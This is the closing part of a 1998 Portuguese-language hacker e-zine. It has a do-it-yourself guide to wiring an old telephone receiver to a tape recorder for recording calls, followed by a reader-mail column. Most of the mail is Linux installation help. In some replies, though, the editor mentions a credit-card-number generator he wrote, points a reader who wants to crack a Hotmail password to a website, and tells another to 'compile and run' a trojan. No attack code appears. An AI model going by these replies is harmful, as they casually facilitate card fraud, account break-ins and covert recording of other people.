=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


                  
 13 - Gravando conversas
                  
    [_Hi-Fi_]
                     -



	  Gravando conversas a partir seu telefone velho

 
   Como primeira materia, quero dizer que voces me respondam pra saber se devo
continuar escrevendo e tal. E, se nao entenderem o esquema, perguntem diretamente
para mim ok?

   Voce, que sempre quis saber como gravar suas conversas mas nao sabe nada de
componentes eletronicos, soldar, e esses baguio pra fazer uma color box decente,
agora tem uma opcao: sabe aquele seu aparelho de telefone tipo "tijolao" que
cedeu lugar aos mais moderninhos e que estava jogado num canto? Pois e.. a partir
dele voce pode gravar conversas! Como? Vamos la:

O que voce precisa para fazer a "propria":

-O aparelho de telefone (pode ser qualquer um, contanto que tenha o receptor
(auto-falante) em condicoes)
-um pino femea mono(daqueles de walkman, pode tirar um de um radio velho)
-dois pinos machos mono(de fone de ouvido antigo... prefira o mono porque dai
nao tem frecura)
-fio para fone de ouvido mono
-um gravador (qualquer coisa que grave a conversa)
-solda, ferro de solda e "paciencia"...

Procedimento:

   Em principio, isso e muito facil de fazer. Quem manja de eletronica e capaz
de dizer: "esse cara e panaca, fica escrevendo essas bostas..." mas... tem gente
que nao sabe" E, para essas, comecemos.
   Abra o "lugar onde voce fala" (esqueci o nome) e veja o receptor:  ele esta
ligado com dois fios ao resto do telefone. Nesses dois fios
voce vai soldar os fios do fone de ouvido. Soldado os fios, voce escolhe: se
quiser tambem usar o telefone para fazer ligacoes, solde as outras pontas do
fio num pino femea. O telefone vai ficar assim:

receptor do telefone
                   _____
                 /    ..|           _
                |     ..|----------|_0
                |    |..|           pino femea mono
                |    |

  No telefone, voce ja fez tudo. Agora, pegue um pino macho e solde o fio nele.
Entao, na outra ponta solde o outro pino macho. Ficara assim:

   pino macho                                             pino macho
      __                                                     __
   --)__|---------------------------------------------------|__(--


   E e isso! Quando voce quiser gravar a conversa, pegue outro telefone e atenda,
ou ligue para alguem. Entao, tire ESSE telefone do gancho e conecte um pino macho
no pino femea, e o outro no gravador. VOILA! 


  Mas... se o telefone for velho mesmo e voce achou muito complicado (vixi...),
pode soldar direto os fios que estao ligados no receptor direto em um pino macho.
Ficara assim:

     _____
   /    ..|           __
  |     ..|----------|__(-
  |    |..|           pino macho
  |    |

   ... E conecte direto no gravador.


 * Esclarecimentos:
1- Quando voce tira esse telefone do gancho para gravar, a conversa fica mais
baixa sim.
2- Quando se conecta o pino macho no femea, a som do auto-falante e cortado. E,
se a pessoa for "sem tempo" e fizer pelo segundo metodo, o som do auto falante nao
sera mais ouvido.
3- Como eu disse, esse projeto e muito simples, e nao tem daquelas frescura de
"comeca a gravar quando se atende...", nao deixa o ruido da linha mais baixo...",
e outras coisas de espiao. Se quizer realmente um projeto assim.. se especialize
em eletronica e monte uma box profissional!
4- Se voce ligar um pino macho na saida de som do gravador e o outro pino no tel..
eu nao testei, mas acho que da pra colocar o som na linha e tal...
  Bom... e tudo. Espero que v6 tenham entendido e, se tiverem alguma sugestao, nao
deixem de mandar mais, e tal. E so!

                                                       [_Hi-Fi_]


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


                  
 14 - Mails
                  
    [Leitores]
                     -


Na edicao passada, por descuido meu, acabei deixando de fora a secao de mails.. :>
Foi mal.. e pra compensar..
BLAcK MaSK

<subject: como me associar?>
<from: ???????@sysnetway.com.br>
<to: black_mask@usa.net>
> ei por favor como devo me associar a vc's? 
> eu fao tudo que for possivel dentro dos meus limites pra me tornar 
> hacker. 
> se vc's puderem me ajudar com esse sonho ficarem em divida com vc's! 
> obrigado!!!! 
> 
> aviso:ainda sou kabao nessa historia de hackear 
> ear 
Bom... a gente nao esta aceitando mais membros, mas se vc quiser trocar umas ideias c/agente,
vai no #hackphr da BrasNET.
 


<subjetc: oi>
<from: ?????@mii.zaz.com.br>
<to: black_mask@usa.net>
> Cara usei seu "programinha de carto de crdito" e achei mdio.
> Onde vc fez ele? vb?
> sabe qual verso do linux  melhor? at hoje nenhum linux rodou aqui, pode me
> ajudar a pegar uma boa verso? 
> Aguardo resposta.
> Abrao
> Pardal
Ae, eu fiz akele programa q gera cc soh por hobby mesmo, nada sofisticado.
Eh, usei VB 5.0. Quanto a versao do linux, eu uso e prefiro RH, mas...
Se quiser comprar o CD com o linux vai em www.linuxmall.com
T+


<subjetc: >
<from: ????@hotmail.com>
<to: black_mask@usa.net>
15/08
> Fala  manoW, blz?? 
> 
> Tenho todas edicao do zine e na edicao 5, li a parte q vc fala do linux 
> ....  q eu tenho uma duvida e se puder exclarece-la, mande-me um 
> email.... 
> 
> 
> Eu como muitos amo linux, mas eu nao consigo instala-lo em meu micro... 
>  que ele nao aceita fat32... e tbem gostaria de saber se posso dexar 
> linux e win95 no mesmo HD.... meu hd  3.2, Fat32... 
> 
> valeu manoW...  
Ae blz? 
Seguinte, primeiro eu tinha q saber qual distribuicao do Linux vc tah uando (RH, 
Slack, etc)... 
Mas isso de FAT32 nao importa, pelo menos com o RH(no Slack vc pode ateh 
instala-lo na particao FAT32 junto com o win95!), eh soh vc fazer os disks de 
boot, bootar e por o CD no drive q comeca a instalacao... 
Pode usar os dois no mesmo HD sim... Ele usa um boot manager(LILO) q dah a opcao 
de bootar pelo linux ou pelo rwin.. 
Acho q era soh isso.. 
Valew 
[]s 
---
22/08
> Ae manow, blz?? 
> 
> valeu pela ajuda q vc me deu....com a sua ajuda e com um manual q eu 
> peguei eu instalei o slack 3.5 no meu hd... 
> 
> Valeu !!!! 
BLZ!!! 
Bom saber q pude ajudar vc e q agora temos mais um linuxer!!! 
Espero q goste e se apaixone por este OS, assim como eu, e nao hesite 
em pedir ajuda... 
Hasta luego! 


<subjetc: >
<from: ??????@cpovo.net>
<to: black_mask@usa.net>
> Preciso de ajuda para quebrar uma senha do hotmail.
> Voc sabe como se faz, ou conhece algum site que ensine?
> valeu
Vide www.antionline.com ;)


<subjetc: Cavalo de Troia>
<from: ??????@sma.zaz.com.br>
<to: black_mask@usa.net>
> Cara como uso esse arquivo?
>  " .c ", preciso estar usando Linux??
Compila e roda. Nao necessariamente. t+


<subjetc: Linux>
<from: ??????@ips.com.br>
<to: black_mask@usa.net>
> fala, blz!!
> Admiro muito sua parte no zine e estou com um grande problema no linux!!
> Meu computador eh um Itautec Infoway Pentium 133mhz 32MB de RAM 1MB de video.
> Depois q instalei o linux, quando tentei entrar no X-Windows ele travou,
> aparecendo apenas o cursor do
> mouse(acho que era uma bola) e o background. 
> Vc sabe como faco para arrumar esse erro? 
> valeu!
> fal 
> SysBurner
blz! obrigado pelos elogios! Bem, vc deve configurar o x-windows pra rodar
com a configuracao da sua placa de video e monitor. Pra isso existe o
Xconfigurator e xf86config.. Provavelmente vc precisarah dos manuais da
placa e monitor.. aih eh soh salvar as modificacoes e voilah!


<subjetc: Hi>
<from: ??????????@innocent.com>
<to: black_mask@usa.net>
> ae cara aqui  Dark LorD 
> preciso de umas dicas tuas 
> eu me cadastrei no HOME.ML.ORG 
> e eu nao consigo deixar a URL da minha pagina assim q nem a sua: 
> 
> www.darklord666.base.org 
> 
> gostaria q me ajudasse se nao fosse encmodo 
> 
> 
> Dark LorD 
eh soh vc ir em members.ml.org 
digitar o ID e senha 
e depois editar a URL q vc quer 
tipo escolhe entre .base.org ou .home.ml.org e poe o end da tua hp q vc jah
tem.. ou deve ter.. eles nao dao espaco, soh redirecionamento.. falow!


<subjetc: >
<from: s????????@rol.com.br>
<to: black_mask@usa.net>
> opa mano, blz?
> eu gostaria de me tornar uma hacker se possivel, vc poderia medar umas dicas, uma ajuda?
> desde j agradeo.
Ahamm.. proximo.


<subjetc: Install Linux+Win>
<from: ?????@ez-poa.com.br>
<to: black_mask@usa.net>
> Ae, 
> Cara, eu j li um monte de textos de instalao do linux, eu j tenho o CD, 
> mas o meu velho, precisa da bosta do win e cara, os textos que eu achei pra 
> deixar o win com o linux eram em ingls e uma complicao s. Olha, eu j to 
> a bastante tempo tentando instalar isso, se tu puder me ajudar eu ficaria 
> muito grato, porque eu no aguento mais windows e quero ter linux, j sei 
> bastante coisa, ja tenho bastante coisa no meu HD, acho que eu j posso 
> comear a mexer no Linux, mas ainda no encontrei como. Queria que tu me 
> indicasse um texto ou algo assim pra eu instalar, preciso mesmo t? 
> Valeu, 
claro q posso ajudar... veja isso: www.netdados.com.br/tlm 
falow


cabooooo!!!!!!


"Those who would sacrifice a little privacy for more security, deserve
neither privacy nor security."  
                                                                 Ben Franklin


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
	*** H.P.G. - High Technologies and Research Heavy Industries ***
		  Publication #06, October, 1998 - All rights reserved.

					--=+ +-=- ++=+

Toda e qualquer informacao retirada deste e-zine deverah conter entre outras
coisas,o autor e numero da edicao.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
					End^Of^File
